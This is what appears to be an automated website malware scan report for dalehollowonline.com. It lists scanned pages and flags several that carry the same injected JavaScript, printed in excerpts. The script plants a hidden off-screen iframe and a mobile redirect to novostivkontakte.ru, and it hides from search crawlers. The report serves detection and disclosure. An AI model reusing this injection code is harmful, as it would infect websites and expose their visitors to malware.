Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=dalehollowonline.com
Result: The website is marked by Google as suspicious; visiting this website may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious; visiting this website may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://dalehollowonline.com/ | 200 OK Content-Length: 34948 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: novostivkontakte.ru. In the visible excerpt the script appends a borderless frame element positioned at left -200 (off-screen) that points at that domain, unless the user agent matches a search-crawler pattern (so a scan run with a crawler user agent would not see the frame), and the decoded part redirects mobile user agents to the same domain after a one-second timer. ...[549 bytes skipped]... order = "0"; dsdSSSWrw515312FFF.style.position = "absolute"; dsdSSSWrw515312FFF.style.left = "-200"; dsdSSSWrw515312FFF.setAttribute("frameBorder", "0"); document.body.appendChild(dsdSSSWrw515312FFF); dsdSSSWrw515312FFF.src = agaga31323l; return true; } } function asd61234tkhjasd454hfhf235(){ sd5135GHEDF("http://novostivkontakte.ru/?id=ifrm"); } function SFWR64362fdhHHHHH(){ if(navigator.userAgent.match(/(Googlebot|robot|Slurp|search.msn.com|nutch|simpy|bot|ASPSeek|crawler|msnbot|Libwww-perl|FAST|Baidu|googlebot|slurp|aspseek|libwww-perl|fast|baidu)/i)!==null){ }else{asd61234tkhjasd454hfhf235();} if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|mobile|android|blackberry|brew|cldc|doc ...[940 bytes skipped]... Decoded script: ...[349 bytes skipped]... roid|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|mobile|android|blackberry|brew|cldc|docomo|htc|j2me|micromax|lg|midp|mot|motorola|netfront|nokia|obigo|openweb|opera.mini|palm|psp|samsung|sanyo|sch|sonyericsson|symbian|symbos|teleca|up.browser|vodafone|wap|webos|windows.ce)/i) !== null) { try { setTimeout(function () {window.location = "http://novostivkontakte.ru/?id=mob";}, 1000); } catch (err) { window.location = "http://novostivkontakte.ru/?id=mob"; location.href = "http://novostivkontakte.ru/?id=mob"; } } } | ||
http://dalehollowonline.com/media/system/js/core.js | 200 OK Content-Length: 3616 Content-Type: application/javascript | clean |
http://dalehollowonline.com/media/system/js/mootools-core.js | 200 OK Content-Length: 83987 Content-Type: application/javascript | clean |
http://dalehollowonline.com/media/system/js/caption.js | 200 OK Content-Length: 800 Content-Type: application/javascript | clean |
http://dalehollowonline.com/media/system/js/mootools-more.js | 200 OK Content-Length: 224389 Content-Type: application/javascript | clean |
http://dalehollowonline.com/templates/beez_20/javascript/md_stylechanger.js | 200 OK Content-Length: 2104 Content-Type: application/javascript | clean |
http://dalehollowonline.com/modules/mod_ariyuimenu/mod_ariyuimenu/js/yui.combo.js | 200 OK Content-Length: 136091 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The excerpt shown appears to be only the start of the library code and contains no reference to the blacklisted domain, so the flagged portion is not visible here; comparing the file against a known-good copy of the library would locate the injected part. if(typeof YAHOO=="undefined"||!YAHOO){var YAHOO={};}YAHOO.namespace=function(){var A=arguments,E=null,C,B,D;for(C=0;C<A.length;C=C+1){D=(""+A[C]).split(".");E=YAHOO;for(B=(D[0]=="YAHOO")?1:0;B<D.length;B=B+1){E[D[B]]=E[D[B]]||{};E=E[D[B]];}}return E;};YAHOO.log=function(D,A,C){var B=YAHOO.widget.Logger;if(B&&B.log){return B.log(D,A,C);}else{return false;}};YAHOO.register=function(A,E,D){var I=YAHOO.env.modules,B,H,G,F,C;if(!I[A]){I[A]={versions:[],builds:[]};}B=I[A];H=D.version;G=D Antivirus reports:
| ||
http://dalehollowonline.com/plugins/content/jw_simpleImageGallery/jw_simpleImageGallery/includes/jquery/jquery-1.4.4.min.js | 200 OK Content-Length: 78601 Content-Type: application/javascript | clean |
http://dalehollowonline.com/plugins/content/jw_simpleImageGallery/jw_simpleImageGallery/includes/slimbox-2.04/js/slimbox2.js | 200 OK Content-Length: 4123 Content-Type: application/javascript | clean |
http://dalehollowonline.com/templates/beez_20/javascript/hide.js | 200 OK Content-Length: 7704 Content-Type: application/javascript | clean |
http://dalehollowonline.com/index.php?option=com_content&view=featured&Itemid=435 | 200 OK Content-Length: 35164 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: novostivkontakte.ru ...[549 bytes skipped]... order = "0"; dsdSSSWrw515312FFF.style.position = "absolute"; dsdSSSWrw515312FFF.style.left = "-200"; dsdSSSWrw515312FFF.setAttribute("frameBorder", "0"); document.body.appendChild(dsdSSSWrw515312FFF); dsdSSSWrw515312FFF.src = agaga31323l; return true; } } function asd61234tkhjasd454hfhf235(){ sd5135GHEDF("http://novostivkontakte.ru/?id=ifrm"); } function SFWR64362fdhHHHHH(){ if(navigator.userAgent.match(/(Googlebot|robot|Slurp|search.msn.com|nutch|simpy|bot|ASPSeek|crawler|msnbot|Libwww-perl|FAST|Baidu|googlebot|slurp|aspseek|libwww-perl|fast|baidu)/i)!==null){ }else{asd61234tkhjasd454hfhf235();} if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|mobile|android|blackberry|brew|cldc|doc ...[940 bytes skipped]... Decoded script: ...[349 bytes skipped]... roid|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|mobile|android|blackberry|brew|cldc|docomo|htc|j2me|micromax|lg|midp|mot|motorola|netfront|nokia|obigo|openweb|opera.mini|palm|psp|samsung|sanyo|sch|sonyericsson|symbian|symbos|teleca|up.browser|vodafone|wap|webos|windows.ce)/i) !== null) { try { setTimeout(function () {window.location = "http://novostivkontakte.ru/?id=mob";}, 1000); } catch (err) { window.location = "http://novostivkontakte.ru/?id=mob"; location.href = "http://novostivkontakte.ru/?id=mob"; } } } | ||
http://dalehollowonline.com/index.php?option=com_content&view=article&id=74&Itemid=475 | 200 OK Content-Length: 19907 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: novostivkontakte.ru ...[549 bytes skipped]... order = "0"; dsdSSSWrw515312FFF.style.position = "absolute"; dsdSSSWrw515312FFF.style.left = "-200"; dsdSSSWrw515312FFF.setAttribute("frameBorder", "0"); document.body.appendChild(dsdSSSWrw515312FFF); dsdSSSWrw515312FFF.src = agaga31323l; return true; } } function asd61234tkhjasd454hfhf235(){ sd5135GHEDF("http://novostivkontakte.ru/?id=ifrm"); } function SFWR64362fdhHHHHH(){ if(navigator.userAgent.match(/(Googlebot|robot|Slurp|search.msn.com|nutch|simpy|bot|ASPSeek|crawler|msnbot|Libwww-perl|FAST|Baidu|googlebot|slurp|aspseek|libwww-perl|fast|baidu)/i)!==null){ }else{asd61234tkhjasd454hfhf235();} if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|mobile|android|blackberry|brew|cldc|doc ...[940 bytes skipped]... Decoded script: ...[349 bytes skipped]... roid|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|mobile|android|blackberry|brew|cldc|docomo|htc|j2me|micromax|lg|midp|mot|motorola|netfront|nokia|obigo|openweb|opera.mini|palm|psp|samsung|sanyo|sch|sonyericsson|symbian|symbos|teleca|up.browser|vodafone|wap|webos|windows.ce)/i) !== null) { try { setTimeout(function () {window.location = "http://novostivkontakte.ru/?id=mob";}, 1000); } catch (err) { window.location = "http://novostivkontakte.ru/?id=mob"; location.href = "http://novostivkontakte.ru/?id=mob"; } } } | ||
http://dalehollowonline.com/index.php?option=com_content&view=article&id=71&Itemid=476 | 200 OK Content-Length: 29290 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: novostivkontakte.ru ...[549 bytes skipped]... order = "0"; dsdSSSWrw515312FFF.style.position = "absolute"; dsdSSSWrw515312FFF.style.left = "-200"; dsdSSSWrw515312FFF.setAttribute("frameBorder", "0"); document.body.appendChild(dsdSSSWrw515312FFF); dsdSSSWrw515312FFF.src = agaga31323l; return true; } } function asd61234tkhjasd454hfhf235(){ sd5135GHEDF("http://novostivkontakte.ru/?id=ifrm"); } function SFWR64362fdhHHHHH(){ if(navigator.userAgent.match(/(Googlebot|robot|Slurp|search.msn.com|nutch|simpy|bot|ASPSeek|crawler|msnbot|Libwww-perl|FAST|Baidu|googlebot|slurp|aspseek|libwww-perl|fast|baidu)/i)!==null){ }else{asd61234tkhjasd454hfhf235();} if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|mobile|android|blackberry|brew|cldc|doc ...[940 bytes skipped]... Decoded script: ...[349 bytes skipped]... roid|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|mobile|android|blackberry|brew|cldc|docomo|htc|j2me|micromax|lg|midp|mot|motorola|netfront|nokia|obigo|openweb|opera.mini|palm|psp|samsung|sanyo|sch|sonyericsson|symbian|symbos|teleca|up.browser|vodafone|wap|webos|windows.ce)/i) !== null) { try { setTimeout(function () {window.location = "http://novostivkontakte.ru/?id=mob";}, 1000); } catch (err) { window.location = "http://novostivkontakte.ru/?id=mob"; location.href = "http://novostivkontakte.ru/?id=mob"; } } } | ||
http://dalehollowonline.com/index.php?option=com_content&view=article&id=70&Itemid=472 | 200 OK Content-Length: 20649 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: novostivkontakte.ru ...[549 bytes skipped]... order = "0"; dsdSSSWrw515312FFF.style.position = "absolute"; dsdSSSWrw515312FFF.style.left = "-200"; dsdSSSWrw515312FFF.setAttribute("frameBorder", "0"); document.body.appendChild(dsdSSSWrw515312FFF); dsdSSSWrw515312FFF.src = agaga31323l; return true; } } function asd61234tkhjasd454hfhf235(){ sd5135GHEDF("http://novostivkontakte.ru/?id=ifrm"); } function SFWR64362fdhHHHHH(){ if(navigator.userAgent.match(/(Googlebot|robot|Slurp|search.msn.com|nutch|simpy|bot|ASPSeek|crawler|msnbot|Libwww-perl|FAST|Baidu|googlebot|slurp|aspseek|libwww-perl|fast|baidu)/i)!==null){ }else{asd61234tkhjasd454hfhf235();} if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|mobile|android|blackberry|brew|cldc|doc ...[940 bytes skipped]... Decoded script: ...[349 bytes skipped]... roid|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|mobile|android|blackberry|brew|cldc|docomo|htc|j2me|micromax|lg|midp|mot|motorola|netfront|nokia|obigo|openweb|opera.mini|palm|psp|samsung|sanyo|sch|sonyericsson|symbian|symbos|teleca|up.browser|vodafone|wap|webos|windows.ce)/i) !== null) { try { setTimeout(function () {window.location = "http://novostivkontakte.ru/?id=mob";}, 1000); } catch (err) { window.location = "http://novostivkontakte.ru/?id=mob"; location.href = "http://novostivkontakte.ru/?id=mob"; } } } | ||
http://dalehollowonline.com/index.php?option=com_content&view=article&id=74&Itemid=477 | 200 OK Content-Length: 20114 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: novostivkontakte.ru ...[549 bytes skipped]... order = "0"; dsdSSSWrw515312FFF.style.position = "absolute"; dsdSSSWrw515312FFF.style.left = "-200"; dsdSSSWrw515312FFF.setAttribute("frameBorder", "0"); document.body.appendChild(dsdSSSWrw515312FFF); dsdSSSWrw515312FFF.src = agaga31323l; return true; } } function asd61234tkhjasd454hfhf235(){ sd5135GHEDF("http://novostivkontakte.ru/?id=ifrm"); } function SFWR64362fdhHHHHH(){ if(navigator.userAgent.match(/(Googlebot|robot|Slurp|search.msn.com|nutch|simpy|bot|ASPSeek|crawler|msnbot|Libwww-perl|FAST|Baidu|googlebot|slurp|aspseek|libwww-perl|fast|baidu)/i)!==null){ }else{asd61234tkhjasd454hfhf235();} if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|mobile|android|blackberry|brew|cldc|doc ...[940 bytes skipped]... Decoded script: ...[349 bytes skipped]... roid|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|mobile|android|blackberry|brew|cldc|docomo|htc|j2me|micromax|lg|midp|mot|motorola|netfront|nokia|obigo|openweb|opera.mini|palm|psp|samsung|sanyo|sch|sonyericsson|symbian|symbos|teleca|up.browser|vodafone|wap|webos|windows.ce)/i) !== null) { try { setTimeout(function () {window.location = "http://novostivkontakte.ru/?id=mob";}, 1000); } catch (err) { window.location = "http://novostivkontakte.ru/?id=mob"; location.href = "http://novostivkontakte.ru/?id=mob"; } } } |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: dalehollowonline.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 07 Jan 2015 22:11:50 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: 91b7da0dc4e6bfc973ff8ed4fc2c48d8=btk765r1jnrg0h5db0gtrorbq7; path=/
GET / HTTP/1.1
Host: dalehollowonline.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 07 Jan 2015 22:11:50 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: 91b7da0dc4e6bfc973ff8ed4fc2c48d8=btk765r1jnrg0h5db0gtrorbq7; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: dalehollowonline.com
Referer: http://www.google.com/search?q=dalehollowonline.com
Result:
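The result is similar to the first query. There are no suspicious redirects found. This check looks at the HTTP response only; the client-side redirect for mobile user agents in the injected script listed under "Scanned pages/files" runs in the browser and would not appear here.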
GET / HTTP/1.1
Host: dalehollowonline.com
Referer: http://www.google.com/search?q=dalehollowonline.com
Result:
The result is similar to the first query. There are no suspicious redirects found.